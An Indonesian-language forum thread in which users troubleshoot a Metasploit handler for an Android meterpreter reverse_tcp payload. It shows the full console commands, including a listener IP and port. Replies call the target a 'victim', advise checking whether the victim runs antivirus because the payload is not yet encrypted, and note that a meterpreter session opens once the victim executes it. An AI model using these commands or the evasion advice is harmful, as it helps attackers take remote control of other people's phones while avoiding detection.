04-21-2014, 05:17 PM
(04-19-2014, 10:58 PM)wine trochanter Wrote:(04-19-2014, 07:14 PM)eMJe009 Wrote:(04-19-2014, 06:28 PM)sonyrimawan Wrote:(04-19-2014, 02:00 AM)eMJe009 Wrote: msf > use exploit/multi/handler
msf exploit(handler) > set payload android/meterpreter/reverse_tcp
payload => android/meterpreter/reverse_tcp
msf exploit(handler) > set lhost 95.128.181.59
lhost => 95.128.181.59
msf exploit(handler) > set lport 123
lport => 123
msf exploit(handler) > exploit
[-] Handler failed to bind to 95.xxx.xxx.xx:123
[*] Started reverse handler on 0.0.0.0:123
[*] Starting the payload handler...
Kalo failed gitu gimana om ?
mohon pencerahannya
failednya notifikasinya bagaimana? coba ketahui dulu apakah korban menggunakan antivirus di androidnya. soalnya itu payload masih telanjang belum di enkripsi jadi di antivirus masih ketahuan.
failed pas jalanin exploitnya
[-] Handler failed to bind to 95.xxx.xxx.xx:123
emang gtu kok kalo ane om, tp klo udh di eksekusi sama korban langsung kebuka sesi meterpreter nya
tak kira ada kesalahan instalasi metasploitnya

Udah gini aja :v